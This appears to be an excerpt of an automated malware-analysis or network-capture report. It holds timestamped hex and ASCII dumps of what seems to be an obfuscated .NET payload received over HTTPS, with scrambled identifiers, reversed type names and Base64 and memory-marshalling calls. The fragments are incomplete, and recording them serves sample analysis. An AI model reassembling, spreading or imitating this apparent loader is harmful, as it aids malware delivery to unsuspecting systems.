                                                                                                                                                        2021-12-28 02:23:24 UTC47INData Raw: 20 2c 00 00 00 38 aa d7 ff ff 20 47 00 00 00 20 10 00 00 00 58 fe 0e 28 00 20 0d 00 00 00 fe 0e 29 00 38 89 d7 ff ff fe 0c 11 00 20 12 00 00 00 fe 0c 28 00 9c 20 0c 01 00 00 28 73 01 00 06 3a 70 d7 ff ff 26 20 8e 01 00 00 38 65 d7 ff ff fe 0c 00 00 20 03 00 00 00 20 ce 00 00 00 20 7a 00 00 00 59 9c 20 c3 00 00 00 38 46 d7 ff ff fe 0c 11 00 20 05 00 00 00 20 2d 00 00 00 20 0e 00 00 00 58 9c 20 e7 00 00 00 38 27 d7 ff ff 11 22 17 58 13 22 20 07 00 00 00 28 73 01 00 06 3a 12 d7 ff ff 26 20 23 00 00 00 38 07 d7 ff ff fe 0c 00 00 20 06 00 00 00 20 08 00 00 00 20 45 00 00 00 58 9c 20 71 00 00 00 28 72 01 00 06 39 e3 d6 ff ff 26 20 a2 00 00 00 38 d8 d6 ff ff 20 59 00 00 00 20 64 00 00 00 58 fe 0e 09 00 20 72 01 00 00 38 bf d6 ff ff fe 0c 11 00 20 10 00 00 00 fe
                                                                                                                                                        Data Ascii: ,8 G X( )8 ( (s:p& 8e zY 8F - X 8'"X" (s:& #8 EX q(r9& 8 Y dX r8
                                                                                                                                                        2021-12-28 02:23:24 UTC48INData Raw: 20 b4 00 00 00 38 51 d2 ff ff 20 88 00 00 00 20 2d 00 00 00 59 fe 0e 09 00 20 ed 00 00 00 38 38 d2 ff ff 16 13 22 20 3a 00 00 00 28 73 01 00 06 3a 26 d2 ff ff 26 20 98 00 00 00 38 1b d2 ff ff fe 0c 11 00 20 03 00 00 00 fe 0c 28 00 9c 20 7e 01 00 00 38 03 d2 ff ff fe 0c 11 00 20 0f 00 00 00 20 2d 00 00 00 20 5b 00 00 00 58 9c 20 7f 00 00 00 28 72 01 00 06 3a df d1 ff ff 26 20 6f 00 00 00 38 d4 d1 ff ff fe 0c 11 00 20 1f 00 00 00 20 c5 00 00 00 20 41 00 00 00 59 9c 20 cd 00 00 00 38 b5 d1 ff ff 16 13 0e 20 71 00 00 00 38 a8 d1 ff ff fe 0c 11 00 20 10 00 00 00 fe 0c 28 00 9c 20 e3 00 00 00 28 73 01 00 06 39 8b d1 ff ff 26 20 17 00 00 00 38 80 d1 ff ff fe 0c 11 00 20 0b 00 00 00 20 1c 00 00 00 20 06 00 00 00 58 9c 20 8b 01 00 00 38 61 d1 ff ff fe 0c 11 00 20
                                                                                                                                                        Data Ascii: 8Q -Y 88" :(s:&& 8 ( ~8 - [X (r:& o8 AY 8 q8 ( (s9& 8 X 8a
                                                                                                                                                        2021-12-28 02:23:24 UTC49INData Raw: ff 11 05 1a 5a 13 14 20 58 01 00 00 38 f1 cc ff ff 11 0b 8e 69 1a 5d 13 1e 20 81 00 00 00 38 df cc ff ff 20 f0 00 00 00 20 50 00 00 00 59 fe 0e 09 00 20 ae 00 00 00 38 c6 cc ff ff fe 0c 00 00 20 05 00 00 00 20 3e 00 00 00 20 1b 00 00 00 58 9c 20 89 00 00 00 38 a7 cc ff ff 20 15 00 00 00 20 48 00 00 00 58 fe 0e 09 00 20 50 01 00 00 38 8e cc ff ff fe 0c 11 00 20 17 00 00 00 20 91 00 00 00 20 30 00 00 00 59 9c 20 49 01 00 00 38 6f cc ff ff 20 4a 00 00 00 20 3e 00 00 00 58 fe 0e 28 00 20 a8 01 00 00 38 56 cc ff ff 20 cc 00 00 00 20 44 00 00 00 59 fe 0e 28 00 20 6a 00 00 00 fe 0e 29 00 38 35 cc ff ff 38 9b e5 ff ff 20 5f 00 00 00 28 73 01 00 06 3a 25 cc ff ff 26 20 b1 00 00 00 38 1a cc ff ff fe 0c 00 00 20 07 00 00 00 fe 0c 09 00 9c 20 9f 00 00 00 38 02 cc ff
                                                                                                                                                        Data Ascii: Z X8i] 8 PY 8 > X 8 HX P8 0Y I8o J >X( 8V DY( j)858 _(s:%& 8 8
                                                                                                                                                        2021-12-28 02:23:24 UTC51INData Raw: 26 20 05 00 00 00 38 9e c7 ff ff 73 72 00 00 0a 13 2a 20 42 00 00 00 28 72 01 00 06 39 88 c7 ff ff 26 20 07 01 00 00 38 7d c7 ff ff fe 0c 00 00 20 04 00 00 00 20 b0 00 00 00 20 32 00 00 00 58 9c 20 4b 00 00 00 28 73 01 00 06 3a 59 c7 ff ff 26 20 73 00 00 00 38 4e c7 ff ff fe 0c 11 00 20 19 00 00 00 fe 0c 28 00 9c 20 d2 00 00 00 38 36 c7 ff ff fe 0c 11 00 20 0b 00 00 00 fe 0c 28 00 9c 20 de 00 00 00 38 1e c7 ff ff fe 0c 11 00 20 0a 00 00 00 fe 0c 28 00 9c 20 85 01 00 00 38 06 c7 ff ff 20 10 00 00 00 8d 16 00 00 01 fe 0e 00 00 20 4b 01 00 00 28 72 01 00 06 3a e9 c6 ff ff 26 20 35 01 00 00 38 de c6 ff ff 20 5e 00 00 00 20 45 00 00 00 58 fe 0e 28 00 20 51 01 00 00 38 c5 c6 ff ff 20 b6 00 00 00 20 3c 00 00 00 59 fe 0e 28 00 20 90 01 00 00 38 ac c6 ff ff 20 30
                                                                                                                                                        Data Ascii: & 8sr* B(r9& 8} 2X K(s:Y& s8N ( 86 ( 8 ( 8 K(r:& 58 ^ EX( Q8 <Y( 8 0
                                                                                                                                                        2021-12-28 02:23:24 UTC52INData Raw: fe 0c 01 00 5a 6e fe 0c 07 00 5e 6d fe 0e 01 00 20 df 12 b0 54 fe 0c 1d 00 61 fe 0e 18 00 20 3f 43 06 00 fe 0c 01 00 20 ff 0f 00 00 5f 5a fe 0c 01 00 1f 0c 64 58 fe 0e 01 00 20 82 25 07 00 fe 0c 1d 00 20 ff 0f 00 00 5f 5a fe 0c 1d 00 1f 0c 64 59 fe 0e 1d 00 20 76 c2 00 00 fe 0c 1d 00 5a fe 0c 01 00 59 fe 0e 1d 00 fe 0c 1d 00 fe 0c 1d 00 fe 0c 1d 00 59 61 fe 0e 20 00 fe 0c 0c 00 fe 0c 0c 00 1f 19 62 61 fe 0e 0c 00 fe 0c 0c 00 fe 0c 18 00 58 fe 0e 0c 00 fe 0c 0c 00 fe 0c 0c 00 1d 62 61 fe 0e 0c 00 fe 0c 0c 00 fe 0c 19 00 58 fe 0e 0c 00 fe 0c 0c 00 fe 0c 0c 00 1f 0d 64 61 fe 0e 0c 00 fe 0c 0c 00 fe 0c 20 00 58 fe 0e 0c 00 fe 0c 18 00 1b 62 fe 0c 18 00 58 fe 0c 18 00 61 fe 0c 0c 00 58 fe 0e 0c 00 fe 0c 0c 00 76 6c 6d 58 13 10 20 43 01 00 00 28 73 01 00 06 39
                                                                                                                                                        Data Ascii: Zn^m Ta ?C _ZdX % _ZdY vZYYa baXbaXda XbXaXvlmX C(s9
                                                                                                                                                        2021-12-28 02:23:24 UTC53INData Raw: 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00
                                                                                                                                                        Data Ascii: ********************************
                                                                                                                                                        2021-12-28 02:23:24 UTC57INData Raw: 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 14 2a 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 03 30 03 00 04 00 00
                                                                                                                                                        Data Ascii: *0*0*0*0*0*0*********0*0*0*0*0*0
                                                                                                                                                        2021-12-28 02:23:24 UTC61INData Raw: 04 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 81 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f f7 04 00 06 2a 00 42 28 a9 00 00 06 d0 82 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f fb 04 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 83 00 00 02 28 a0 00 00 06 2a 00 00 00 32 0e 02 0e 00 0e 01 6f ff 04 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 84 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 03 05 00 06 2a 00 42 28 a9 00 00 06 d0 85 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 07 05 00 06 2a 00 42 28 a9 00 00 06 d0 86 00 00 02 28 a0 00 00 06 2a 00 00 00 2a 0e 01 0e 00 6f 0b 05 00 06 2a 00 42 28 a9 00 00 06 d0 87 00 00 02 28 a0 00 00 06 2a 00 00 00 22 0e 00 6f 0f 05 00 06 2a 00 00 00 42 28 a9 00 00 06 d0 88 00 00 02 28 a0 00 00 06
                                                                                                                                                        Data Ascii: *B((**o*B((*2o*B((*2o*B((**o*B((**o*B((**o*B((*"o*B((
                                                                                                                                                        2021-12-28 02:23:24 UTC65INData Raw: 73 1e 06 00 3b 2e 8f 25 06 00 69 2e 8f 25 06 00 14 2f 73 1e 06 00 1f 2f 73 1e 06 00 28 2f 73 1e 06 00 33 2f 73 1e 12 00 1d 32 a6 00 06 00 49 32 da 26 12 00 09 33 a6 00 06 00 b2 35 38 1e 06 00 44 39 5f 00 12 00 c0 3b ce 3b 12 00 e4 3b ce 3b 06 00 20 3c 46 26 06 00 39 3c 5f 00 06 00 53 3c 5f 00 06 00 6f 3c 5f 00 06 00 d9 3e 5f 00 06 00 df 3e 5f 00 06 00 e6 3e 5f 00 06 00 ed 3e 5f 00 06 00 f5 3e 5f 00 06 00 66 4a 5f 00 d7 00 cc 4e 00 00 06 00 8c 50 8f 25 06 00 dd 50 8f 25 06 00 ed 50 5f 00 06 00 14 51 5f 00 06 00 2b 51 5f 00 06 00 a9 51 dd 2a 06 00 27 56 5f 00 0e 00 9b 69 b6 1d 0e 00 52 6a b6 1d 0e 00 38 6f b6 1d 16 00 97 6f a3 6f 06 00 cb 6f 08 2b 06 00 03 71 8f 25 06 00 57 71 71 71 06 00 81 71 5f 00 0a 00 95 71 2b 00 06 00 a6 71 c3 71 06 00 e7 71 c3 71 06
                                                                                                                                                        Data Ascii: s;.%i.%/s/s(/s3/s2I2&358D9_;;;; <F&9<_S<_o<_>_>_>_>_>_fJ_NP%P%P_Q_+Q_Q*'V_iRj8oooo+q%Wqqqq_q+qqqq
                                                                                                                                                        2021-12-28 02:23:24 UTC69INData Raw: 46 ca 0f 06 00 52 46 f0 0e 11 00 5d 46 cf 0f 13 00 04 48 ca 0f 06 00 4b 48 05 10 06 00 56 48 f0 0e 11 00 61 48 08 10 06 06 6b 3b e5 0e 06 06 6b 3b e5 0e 13 00 01 49 34 10 11 00 51 49 3f 10 03 00 8d 49 4a 10 03 00 98 49 ec 01 13 00 a3 49 4f 10 11 00 df 49 5f 10 01 00 3c 4a 6a 10 03 00 47 4a 75 05 11 00 52 4a 6f 10 01 00 a6 4a 8c 10 03 00 b1 4a 75 05 13 00 bc 4a 91 10 03 00 0c 4b aa 10 03 00 17 4b ec 01 13 00 22 4b af 10 01 00 72 4b 6a 10 03 00 7d 4b 75 05 13 00 88 4b c8 10 01 00 d8 4b d3 10 01 00 e3 4b d8 10 11 00 ee 4b dd 10 06 00 2a 4c 75 05 06 00 35 4c bf 05 06 00 40 4c f0 0e 13 00 4b 4c f8 10 06 00 87 4c 75 05 06 00 92 4c f0 0e 06 00 9d 4c bf 05 06 00 a8 4c d8 10 11 00 b3 4c 03 11 06 00 ef 4c 75 05 06 00 fa 4c 75 05 06 00 05 4d 0e 11 13 00 10 4d 13 11
                                                                                                                                                        Data Ascii: FRF]FHKHVHaHk;k;I4QI?IJIIOI_<JjGJuRJoJJuJKK"KrKj}KuKKKK*Lu5L@LKLLuLLLLLuLuMM
                                                                                                                                                        2021-12-28 02:23:24 UTC73INData Raw: 6c 2d 00 00 08 00 83 18 54 00 d7 00 e0 00 74 2d 00 00 08 00 81 00 4c 29 85 06 e0 00 40 2f 00 00 08 00 93 00 56 29 a4 06 e3 00 a4 2f 00 00 08 00 93 00 e1 29 37 01 e3 00 d8 2f 00 00 08 00 93 00 14 2a 88 03 e3 00 f8 2f 00 00 08 00 93 00 51 2a c3 06 e4 00 3c 30 00 00 08 00 93 00 60 2a dc 06 e8 00 4c 30 00 00 08 00 93 00 79 2a f2 06 ec 00 b4 30 00 00 08 00 96 00 b7 2a 12 07 f0 00 2c 37 00 00 08 00 91 00 d3 2c 22 08 f1 00 38 37 00 00 08 00 93 00 dd 2c 37 01 f2 00 3c 37 00 00 08 00 91 00 e7 2c 27 08 f2 00 7c 37 00 00 08 00 93 00 f1 2c 36 08 f4 00 ac 37 00 00 08 00 93 00 11 2d 49 08 f5 00 e0 38 00 00 08 00 91 00 71 2d 5f 08 fb 00 e4 38 00 00 08 00 91 00 7b 2d 37 01 fb 00 14 39 00 00 08 00 91 00 85 2d 90 08 fb 00 74 39 00 00 08 00 93 00 99 2d 37 01 fd 00 44 9e 00
                                                                                                                                                        Data Ascii: l-Tt-L)@/V)/)7/*/Q*<0`*L0y*0*,7,"87,7<7,'|7,67-I8q-_8{-79-t9-7D
                                                                                                                                                        2021-12-28 02:23:24 UTC78INData Raw: ef 00 00 08 00 c6 00 3a 42 64 0f ce 01 98 ef 00 00 08 00 c6 00 45 42 6a 0f ce 01 a8 ef 00 00 08 00 c6 00 54 2b 70 0f ce 01 b8 ef 00 00 08 00 c6 00 50 42 70 0f cf 01 c8 ef 00 00 08 00 c6 00 5b 42 70 0f d0 01 d8 ef 00 00 08 00 c6 00 66 42 70 0f d1 01 e8 ef 00 00 08 00 c6 00 71 42 70 0f d2 01 f8 ef 00 00 08 00 c6 00 7c 42 70 0f d3 01 08 f0 00 00 08 00 c6 00 87 42 70 0f d4 01 18 f0 00 00 08 00 c6 00 92 42 70 0f d5 01 28 f0 00 00 08 00 c6 00 9d 42 70 0f d6 01 38 f0 00 00 08 00 c6 00 a8 42 70 0f d7 01 48 f0 00 00 08 00 c6 00 b3 42 70 0f d8 01 58 f0 00 00 08 00 c6 00 be 42 70 0f d9 01 68 f0 00 00 08 00 c6 00 c9 42 70 0f da 01 78 f0 00 00 08 00 c6 00 d4 42 70 0f db 01 88 f0 00 00 08 00 c6 00 df 42 70 0f dc 01 98 f0 00 00 08 00 c6 00 ea 42 6a 0f dd 01 a0 f0 00 00
                                                                                                                                                        Data Ascii: :BdEBjT+pPBp[BpfBpqBp|BpBpBp(Bp8BpHBpXBphBpxBpBpBj
                                                                                                                                                        2021-12-28 02:23:24 UTC82INData Raw: 00 00 00 00 c6 05 95 41 52 0f 4b 02 00 00 00 00 00 00 c6 05 a0 41 52 0f 4b 02 00 00 00 00 00 00 c6 05 ab 41 52 0f 4b 02 00 00 00 00 00 00 c6 05 b6 41 52 0f 4b 02 00 00 00 00 00 00 c6 05 c1 41 52 0f 4b 02 00 00 00 00 00 00 c6 05 cc 41 58 0f 4b 02 00 00 00 00 00 00 c6 05 d7 41 58 0f 4b 02 00 00 00 00 00 00 c6 05 e2 41 5e 0f 4b 02 00 00 00 00 00 00 c6 05 ed 41 5e 0f 4b 02 00 00 00 00 00 00 c6 05 f8 41 5e 0f 4b 02 00 00 00 00 00 00 c6 05 03 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 0e 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 19 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 24 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 2f 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 3a 42 64 0f 4b 02 00 00 00 00 00 00 c6 05 45 42 6a 0f 4b 02 00 00 00 00 00 00 c6 05 54 2b 70 0f 4b 02 00 00 00 00 00
                                                                                                                                                        Data Ascii: ARKARKARKARKARKAXKAXKA^KA^KA^KBdKBdKBdK$BdK/BdK:BdKEBjKT+pK
                                                                                                                                                        2021-12-28 02:23:24 UTC86INData Raw: 00 08 00 83 00 bc 50 19 13 ed 02 58 06 01 00 08 00 83 00 c7 50 34 13 ef 02 78 06 01 00 08 00 81 00 d2 50 57 13 f1 02 b0 06 01 00 08 00 81 00 3f 51 cf 13 f2 02 c0 06 01 00 08 00 81 00 4a 51 dc 13 f5 02 c8 06 01 00 08 00 81 00 55 51 b3 00 f6 02 d0 06 01 00 08 00 91 00 60 51 e3 13 f7 02 f0 06 01 00 08 00 81 00 7d 51 0c 14 f8 02 00 07 01 00 08 00 91 00 88 51 86 0f fa 02 10 07 01 00 08 00 81 00 93 51 01 0f fb 02 20 07 01 00 08 00 91 00 9e 51 4c 14 fc 02 30 07 01 00 08 00 91 00 1e 52 8d 14 fe 02 40 07 01 00 08 00 91 00 3f 52 8d 14 01 03 50 07 01 00 08 00 91 00 51 52 ff 14 04 03 60 07 01 00 08 00 91 00 c7 52 07 15 06 03 70 07 01 00 08 00 91 00 d2 52 86 0f 07 03 80 07 01 00 08 00 91 00 dd 52 1b 15 08 03 a4 07 01 00 08 00 91 00 e8 52 73 09 09 03 d0 07 01 00 08 00
                                                                                                                                                        Data Ascii: PXP4xPW?QJQUQ`Q}QQQ QL0R@?RPQR`RpRRRs
                                                                                                                                                        2021-12-28 02:23:24 UTC90INData Raw: 08 00 16 00 7d 69 02 1a 35 03 00 00 00 00 03 00 06 18 54 00 65 01 35 03 4c 12 01 00 08 00 10 18 bd 16 37 01 35 03 00 00 00 00 03 00 46 00 15 18 11 1a 35 03 60 12 01 00 08 00 16 00 7d 69 17 1a 35 03 00 00 00 00 03 00 06 18 54 00 65 01 35 03 70 12 01 00 08 00 10 18 bd 16 37 01 35 03 00 00 00 00 03 00 46 00 15 18 25 1a 35 03 84 12 01 00 08 00 16 00 7d 69 2d 1a 35 03 00 00 00 00 03 00 06 18 54 00 65 01 35 03 90 12 01 00 08 00 10 18 bd 16 37 01 35 03 00 00 00 00 03 00 46 00 15 18 3d 1a 35 03 a4 12 01 00 08 00 16 00 7d 69 44 1a 35 03 00 00 00 00 03 00 06 18 54 00 65 01 35 03 b0 12 01 00 08 00 10 18 bd 16 37 01 35 03 00 00 00 00 03 00 46 00 15 18 9d 11 35 03 c4 12 01 00 08 00 16 00 7d 69 53 1a 35 03 00 00 00 00 03 00 06 18 54 00 65 01 35 03 d0 12 01 00 08 00 10
                                                                                                                                                        Data Ascii: }i5Te5L75F5`}i5Te5p75F%5}i-5Te575F=5}iD5Te575F5}iS5Te5
                                                                                                                                                        2021-12-28 02:23:24 UTC94INData Raw: 00 0d 00 56 21 00 00 0e 00 10 21 00 20 00 00 00 00 01 00 01 00 6f 22 02 00 02 00 7d 22 00 00 03 00 69 21 00 00 01 00 10 21 00 00 02 00 17 21 00 20 00 00 00 00 00 20 01 00 ab 22 00 00 02 00 b3 22 00 20 01 00 ab 22 00 00 02 00 b3 22 00 00 03 00 56 21 00 00 04 00 10 21 00 20 00 00 00 00 00 00 01 00 69 21 00 00 01 00 10 21 00 00 02 00 17 21 00 20 00 00 00 00 00 20 01 00 ab 22 00 00 02 00 b3 22 00 20 01 00 ab 22 00 00 02 00 b3 22 00 00 03 00 56 21 00 00 04 00 10 21 00 20 00 00 00 00 00 00 01 00 69 21 00 00 01 00 10 21 00 00 02 00 17 21 00 20 01 00 1e 21 00 20 02 00 70 21 00 20 01 00 1e 21 00 20 02 00 70 21 00 00 03 00 56 21 00 00 04 00 10 21 00 00 01 00 69 21 00 00 01 00 10 21 00 00 02 00 17 21 00 00 01 00 bc 22 00 00 02 00 ca 22 00 00 03 00 d6 22 00 00 04 00
                                                                                                                                                        Data Ascii: V!! o"}"i!!! "" ""V!! i!!! "" ""V!! i!!! ! p! ! p!V!!i!!!"""
                                                                                                                                                        2021-12-28 02:23:24 UTC97INData Raw: f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 02 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 02 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00 00 01 00 f3 28 00
                                                                                                                                                        Data Ascii: (((((((((((((((((((((((((((((((((((((((((((
                                                                                                                                                        2021-12-28 02:23:24 UTC101INData Raw: 00 00 00 21 00 04 00 00 00 22 00 18 00 00 00 23 00 00 00 00 00 24 00 10 00 00 00 25 00 1c 00 00 00 26 00 38 00 00 00 27 00 3c 00 00 00 28 00 0c 00 00 00 29 00 10 00 00 00 2a 00 14 00 00 00 2b 00 00 00 00 00 84 00 00 00 00 00 85 00 00 00 00 00 86 00 00 00 00 00 87 00 00 00 00 00 88 00 00 00 00 00 89 00 00 00 00 00 8d 00 00 00 00 00 8e 00 00 00 00 00 8f 00 00 00 00 00 90 00 00 00 00 00 91 00 00 00 00 00 92 00 00 00 00 00 93 00 00 00 00 00 94 00 82 01 0c 02 43 02 69 02 76 02 13 03 8f 03 33 04 95 05 44 06 8f 06 aa 06 d0 06 fc 06 19 07 2f 08 54 08 ac 08 78 09 da 09 01 0a 1d 0a 2f 0a 40 0a bb 0b 91 0c 10 0d 35 0d 44 0d 51 0d 67 0d 78 0d 90 0d bf 0d e8 0d c3 0e d6 0e 28 0f 37 0f 44 0f 4b 0f 80 0f 8f 0f d4 0f f2 0f 54 10 7c 10 9e 10 bc 10 ec 10 a2 11 aa 11 d4 11
                                                                                                                                                        Data Ascii: !"#$%&8'<()*+Civ3D/Tx/@5DQgx(7DKT|
                                                                                                                                                        2021-12-28 02:23:24 UTC105INData Raw: 31 36 63 51 4c 69 67 47 79 38 30 42 33 00 6c 52 65 38 59 4f 31 54 6e 49 54 74 58 69 56 58 6b 41 47 00 45 70 58 38 4d 31 31 65 41 70 74 68 5a 36 38 37 58 6a 6a 00 63 4b 4e 61 79 37 31 58 61 38 76 6c 6a 65 36 65 68 59 70 00 61 61 30 39 62 45 31 63 52 62 72 69 50 66 45 67 4e 6c 4d 00 63 35 37 64 79 57 31 4b 77 35 32 4e 56 67 53 4e 63 56 4e 00 43 59 6f 50 39 54 31 73 37 74 6c 51 6f 58 67 58 39 57 49 00 73 65 71 32 63 52 31 70 76 64 4a 54 33 4c 65 77 75 49 4e 00 6c 6b 52 50 34 46 31 71 63 78 75 75 68 72 41 4f 4a 6c 4f 00 54 35 53 32 47 6a 31 78 45 34 55 49 36 53 33 6b 77 56 6f 00 59 46 68 71 52 75 31 79 54 30 41 58 77 6c 58 39 45 75 67 00 77 6a 76 6b 4c 5a 31 47 45 4d 54 62 65 67 79 33 6c 57 38 00 74 6b 38 75 4b 66 31 42 61 74 69 35 4e 45 4c 49 6d 78 78 00 4f
                                                                                                                                                        Data Ascii: 16cQLigGy80B3lRe8YO1TnITtXiVXkAGEpX8M11eApthZ687XjjcKNay71Xa8vlje6ehYpaa09bE1cRbriPfEgNlMc57dyW1Kw52NVgSNcVNCYoP9T1s7tlQoXgX9WIseq2cR1pvdJT3LewuINlkRP4F1qcxuuhrAOJlOT5S2Gj1xE4UI6S3kwVoYFhqRu1yT0AXwlX9EugwjvkLZ1GEMTbegy3lW8tk8uKf1Bati5NELImxxO
                                                                                                                                                        2021-12-28 02:23:24 UTC110INData Raw: 72 72 6f 43 65 67 6e 61 68 63 78 45 74 78 65 74 6e 6f 43 73 6c 65 6e 6e 61 68 43 6c 65 64 6f 4d 65 63 69 76 72 65 53 6d 65 74 73 79 53 31 30 35 33 35 00 41 63 74 69 6f 6e 00 61 63 74 69 6f 6e 00 67 65 74 5f 65 74 61 67 65 6c 65 44 78 45 74 70 65 63 63 41 73 74 65 6b 63 6f 53 74 65 4e 6d 65 74 73 79 53 36 31 30 38 39 00 73 65 74 5f 65 74 61 67 65 6c 65 44 78 45 74 70 65 63 63 41 73 74 65 6b 63 6f 53 74 65 4e 6d 65 74 73 79 53 36 31 30 38 39 00 46 78 36 67 35 68 44 54 39 64 73 64 76 49 71 4d 4f 48 33 00 46 33 49 32 34 52 44 76 31 30 4d 4c 31 43 73 44 65 35 46 00 63 76 44 6a 48 6d 44 34 76 45 68 52 56 52 48 41 4e 42 36 00 65 74 61 67 65 6c 65 44 78 45 74 70 65 63 63 41 73 74 65 6b 63 6f 53 74 65 4e 6d 65 74 73 79 53 36 31 30 38 39 00 5f 62 6f 64 79 00 63 62
                                                                                                                                                        Data Ascii: rroCegnahcxEtxetnoCslennahCledoMecivreSmetsyS10535Actionactionget_etageleDxEtpeccAstekcoSteNmetsyS61089set_etageleDxEtpeccAstekcoSteNmetsyS61089Fx6g5hDT9dsdvIqMOH3F3I24RDv10ML1CsDe5FcvDjHmD4vEhRVRHANB6etageleDxEtpeccAstekcoSteNmetsyS61089_bodycb
                                                                                                                                                        2021-12-28 02:23:24 UTC114INData Raw: 46 72 6f 6d 42 61 73 65 36 34 53 74 72 69 6e 67 00 4e 76 51 33 34 75 5a 74 38 39 35 6e 78 45 68 69 32 46 49 72 00 67 65 74 5f 53 69 7a 65 00 4d 61 72 73 68 61 6c 00 52 65 61 64 49 6e 74 33 32 00 52 65 61 64 49 6e 74 36 34 00 41 6c 6c 6f 63 43 6f 54 61 73 6b 4d 65 6d 00 57 72 69 74 65 49 6e 74 50 74 72 00 57 72 69 74 65 49 6e 74 33 32 00 53 6d 65 5a 77 54 4b 4f 72 00 47 37 70 75 73 6f 41 41 4f 00 57 4e 6e 37 56 74 79 75 49 00 47 65 74 4d 65 74 68 6f 64 00 75 57 64 4f 6c 46 61 41 62 00 56 65 72 73 69 6f 6e 00 50 72 6f 63 65 73 73 4d 6f 64 75 6c 65 00 49 44 69 73 70 6f 73 61 62 6c 65 00 50 72 6f 63 65 73 73 00 49 45 6e 75 6d 65 72 61 74 6f 72 00 54 6f 49 6e 74 36 34 00 54 6f 49 6e 74 33 32 00 4d 6f 64 75 6c 65 48 61 6e 64 6c 65 00 47 65 74 46 69 65 6c 64 00
                                                                                                                                                        Data Ascii: FromBase64StringNvQ34uZt895nxEhi2FIrget_SizeMarshalReadInt32ReadInt64AllocCoTaskMemWriteIntPtrWriteInt32SmeZwTKOrG7pusoAAOWNn7VtyuIGetMethoduWdOlFaAbVersionProcessModuleIDisposableProcessIEnumeratorToInt64ToInt32ModuleHandleGetField
                                                                                                                                                        2021-12-28 02:23:24 UTC118INData Raw: 65 76 75 38 4b 6b 6a 00 44 42 71 4b 75 73 48 75 66 4d 4b 65 41 73 71 43 44 56 00 77 56 46 4d 66 65 32 52 51 78 52 73 6c 5a 33 71 77 4d 00 57 52 4d 66 66 53 4c 4d 63 6d 4b 54 59 6c 5a 6e 50 65 00 63 69 52 49 52 33 45 37 67 4a 00 49 73 4c 69 74 74 6c 65 45 6e 64 69 61 6e 00 64 67 52 49 4e 50 77 6d 4d 71 00 6f 35 49 49 72 75 51 42 73 37 00 50 66 50 49 62 75 54 68 64 6c 00 4d 66 6e 49 50 52 4a 6b 31 59 00 62 50 41 49 44 66 6b 66 75 37 00 77 30 79 49 34 6e 51 6f 65 70 00 54 62 47 49 4d 70 55 75 35 58 00 6a 68 4a 49 36 33 54 30 74 4e 00 46 53 75 49 54 66 64 46 63 72 00 78 44 51 39 30 70 62 31 4b 55 63 67 6d 38 69 6f 42 6d 67 00 72 49 6d 49 68 45 74 4c 50 6a 00 55 6c 73 49 69 32 64 32 71 44 00 53 65 55 49 35 52 4f 51 34 55 00 76 65 47 49 41 77 54 51 54 73 